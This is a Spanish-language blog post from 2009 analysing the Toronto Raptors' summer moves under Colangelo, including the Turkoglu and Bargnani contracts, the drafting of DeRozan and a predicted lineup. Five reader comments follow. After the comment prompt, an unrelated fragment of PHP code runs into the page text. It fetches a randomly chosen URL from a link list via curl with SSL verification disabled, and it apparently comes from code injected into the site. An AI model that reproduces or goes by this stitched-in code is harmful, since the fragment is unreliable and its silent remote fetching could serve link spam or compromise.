Toronto Raptors: La marca Colangelo

11 de October de 2009 por TheDeerHunter
Colangelo da una de cal, se ha movido bien durante el verano. Logra volver a transmitir buenas sensaciones desde un proyecto que parecía a la deriva y lo hace desde un estilo muy suyo. Todo lo que se ha hecho lleva visiblemente su firma. Le ha preparado un equipo a Jay Triano completamente nuevo, pero más compensado, experimentado, mejor preparado, con mejores fundamentos y, en definitiva, bastante más atractivo que el antiguo. Todo siguiendo la fórmula que le llevó a las mayores cotas en Toronto, basket-mestizaje y juego ofensivo. El objetivo debería ser intentar alcanzar playoffs y están en condiciones de lograrlo. No es moco de pavo en una conferencia Este tan visiblemente reforzada.

La de arena es que hipoteca de una tacada un tercio del límite salarial blando (casi 20 millones de dólares) comprometido en únicamente dos jugadores por los próximos 5 años. Si el equipo parte con ventaja respecto al año pasado con esta carga será más difícil que en un futuro cercano pueda dar el salto de nivel que les situaría en la élite.

Turkoglu ha sido uno de los mayores objetos de deseo en el mercado de agentes libres este verano tras dos temporadas sublimes coronadas con el subcampeonato. Un contrato de estrella que lleva incluidas las urgencias del equipo por un buen alero y con un  perfil “europeo” que tanto se valora en la franquicia canadiense. Teniendo todo en cuenta se podría pensar que el precio pudiera ser justo. El riesgo reside en que estamos hablando de un hombre de 30 años, que ya está de vuelta de ciertas cosas y que no es que sea un titán físico cuya plenitud pueda perpetuarse por los siglos de los siglos. No hay que olvidar que deberán seguir pagándole un pastizal difícil de digerir cuando tenga 35. Otro posible problema que habrá que tener en cuenta será el impacto de su juego como point-forward y dónde se solapa con un base puro como Calderón. Con todo, es uno de los mejores fichajes que podían hacer en estos momentos y va a aportar múltiples soluciones a ambos lados de la cancha. Los Raptors necesitaban un jugador de su calidad como el agua. Lo vimos claro el año pasado.

El otro gran contrato del verano ha sido el de Bargnani, el niño mimado de Colangelo. Otro 50×5 como quien no quiere la cosa. El caso del italiano casi clama al cielo. Cuando prácticamente todo el mundo lo daba como uno de las elecciones del pick#1 más inservibles de toda la historia, en la peor temporada del equipo, el tipo se destapa con la mejor de sus campañas con diferencia y jugando de center con un par de narices (quien le ha visto…). Pero tras una “correcta” campaña después de varias muy decepcionantes llama la atención el contratazo como si de estrella consolidada se tratara. Creo que es evidente que todavía no se lo ha ganado y peor será si la temporada que viene vuelve a las andadas con su ya acostumbrada flojera. Tampoco parece el pívot más idóneo para jugar al lado de Bosh, lo cual nos ofrece dudas acerca de lo que se proponen con respecto a la renovación de éste. Ojalá todas las incógnitas se disipen y sea capaz de cerrarnos la boca a todos. Tan solo manteniendo el buen tono del año pasado el equipo tendría mucho ganado… y ya ni os cuento si lograra aprender a coger rebotes.

La siguiente incorporación en orden de relevancia sería DeMar DeRozan, flamante elección nº#9 del draft. Otro alero buscando corregir el gran déficit que padecieron en la posición la temporada pasada. Se supone que podrá aportar desde el principio de ‘3’ o de ‘2’ gracias a su portentoso físico, pero por si las moscas Triano desea ir más despacio con él, posee hasta 4 opciones nuevas más para cubrir las alas (sin contar a Turkoglu). Está “il mago” Bellinelli, otro italiano que este año se hacen fuertes en el equipo cosmopolita por antonomasia. Siendo escolta no entendemos cómo narices no ha terminado de servirle a Nelson para jugar incluso de pívot si hubiera hecho falta. Tuvo un gran principio el curso pasado, pero ha sufrido demasiados problemas en Oakland para terminar claudicando ante la irrupción de Morrow. Un tirador puro muy en sintonía con la filosofía Raptor. Si no explota aquí difícilmente lo hará en ningún otro sitio. Sus teóricos defectos defensivos deberán ser minimizados por el alero fuerte Antoine Wright, procedente de Dallas. Curiosamente ambos han llegado incluidos en la operación Marion, que no llegó a involucrarse en ningún momento en el proyecto. Ocuparán el fondo del banquillo Quincy Douby y Sonny Weems, por si le sobra algún minuto a los otros 4. 6 aleros nuevos (todos) a cada cual más distinto… Todo un récord.

Pero la revolución de Collangelo no termina aquí. Ni mucho menos. Vuelve el “hijo pródigo” esloveno Nesterovic tras su fugaz paso por Indiana, que ya demostró hace dos años que se acopla bien a esta filosofía de juego. Además, mejoran la rotación mediante retales de otros, por dentro con Amir Johnson, un diamante en bruto que no han logrado pulir en Detroit, y con el rocoso, por todos conocido, Reggie Evans. Por último, pero no menos importante, también han traído a Jarret Jack que hizo el año pasado su mejor temporada en los Pacers y que es una gran alternativa a Calderón. Habrá que ver si todas estas interesantes novedades son compatibles con formar equipo de la noche a la mañana.

Los dos únicos jugadores verdaderamente veteranos, si no contamos a Bargnani que prácticamente es un hombre nuevo ni a Weems ni a Patrick O’Bryant que apenas llegaron con la temporada terminada, son Chris Bosh y Calderón. Ambos tendrán su particular reválida esta temporada. Del primero hay quien ya dice que se trata de un bluff al estilo Gasol de los Grizzlies y que no tiene carácter para ser el hombre franquicia. De momento ya nos ha mostrado lo sobre-motivado que llega volviendo pasadísimo de peso de vacaciones. Preocupa. Por si parte, el extremeño debe empezar a justificar su gran contrato tras haberse pasado gran parte de la anterior campaña en plan imaginaria debido a las lesiones agravadas, se dice, por los exigentes veranos con la selección. Este curso lo empieza muy mentalizado habiéndose visto obligado a renunciar al oro de Polonia. Si consigue cuajar una buena campaña igual logra convencer a su compañero Bosh de que se quede en el equipo. Le echará mucho de menos si no lo logra.

Quinteto inicial: Calderon, Belinelli, Turkoglu, Bosh, Bargnani
6º Hombre: DeMar DeRozan
Pronóstico: Rozando los playoffs.

Comenta

5 comentarios a esta entrada

  1. sergio dice:
    #1

    Bonita plantilla pero crea muchas dudas. Es dificil hacer una prediccion de un equipo con tanta gente nueva aunque algunos sean de muchisimo potencial (por demostrar como DeRozan o Bellinelli). Lo mismo son el equipo con mas victorias respecto al año anterior que se quedan en farolillo rojo del este (serlo en el oeste es mas dificil) en funcion de como los haga trabajar el señorito Triano. Hablando de entrenador… ¿es realmente la opcion correcta? Me encantaria ver a D’antoni en este equipo mucho antes que en NY. Un poquito de Run & Gun con base y pivots y aleros con buena muñeca haria disfrutar a mucha gente de Canada aparte de no entender muy bien si D’Antoni es un entrenador adecuado para una supuesta llegada de Lebron a la Gran Manzana.
    Por cierto, ¿alguien sabe los millones que tienen de espacio salarial el año que viene? y quien los libera claro… porque me parece un destino interesante. Quizas no para Lebron o Wade pero si para Amare o J.Johnson que pueden aportar algo muy interesante al equipo.

      Citar

  2. TheDeerHunter dice:
    #2

    Pues según HoopsHype tendrían garantizados para el próximo verano los 9 de Calderón, 8 de Bargnani y pongamos otros 9 de Turkoglu. A esto hay que añadir 5 de Reggie Evans, Jarret Jack y todavía de Marcus Banks, 2,5 del rookie… más una player option de 17 kilos de Bosh y una team option de 2,5 por Bellinelli.

    Vendrían a ser unos 45 garantizados a expensas de lo que pase con Bosh. Si está en 58 el límite blando…

      Citar

  3. Jabho dice:
    #3

    El equipo más europeo de la liga, con hasta 3 jugadores titulares de Europa más Belinelli y Nesterovic jugando minutos. Creo que Jack será titular de escolta y compartirá minutos de escolta con los base suplente. Para mi más de cal que de arena Colangelo y si algo le ha sobrado es el contrato de Bargnani, aunque un 7 pies se gana los 10$ o casi allí con la gorra (Verjajaos y similares)

    Buenos movimientos y me gusta muuuuucho el equipo. Creo que van a ser la sopresa del Este y que lucharan por la 4ª plaza. Tienen un problema en el rebote y es que salvo Bosh y Evans son flojitos reboteadores, les falta algo de atletismo y defensa, pero me gusta el estilo europeo, creo que en ataque de la amno del duo Calde&Turkoglu lo van a hacer muy bien. Apuesto por ellos como 4º o 5º del Este

      Citar

  4. L.Casei dice:
    #4

    A mí me da mala espina este equipo, y no sé porqué. Creo que Colangelo ha hecho todo lo contrario a lo que hizo el verano pasado, asumiendo su error: ha conformado un plantel bastante completo, mucho más profundo y con más recursos, pero no me acaba de cuadrar, dudo de que funcionen como equipo.
    Donde más dudas dejan es en defensa (sobre todo interior) y en potencial físico global, en lo que creo están lejos de otros equipos de Conferencia.
    Para mi fue una gran sorpresa la renovación de Triano, por lo visto la temporada pasada. Me da la impresión de que es el técnico moldeable ideal para que Colangelo haga y deshaga a su antojo. Veremos si me equivoco, pero los veo en la Atlantic por detrás de Boston, Philadelphia e incluso New York. No creo que se clasifique para playoffs, y empezarán un nuevo proyecto sin Chris Bosh el año que viene.

      Citar

  5. M dice:
    #5

    Esta temporada es la temporada. Si fracasan, tendrán que empezar de 0…dentro de unas temporadas aún, con todo lo que hipotecan por hacerse fuertes en ésta. Supongo que la posiblidad de ser un destino atractivo para el que está y alguien que pudiera animarse el próximo verano les ha hecho hacer algo innovador. No tengo ni idea de como les irá, obviamente, espero que bien.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>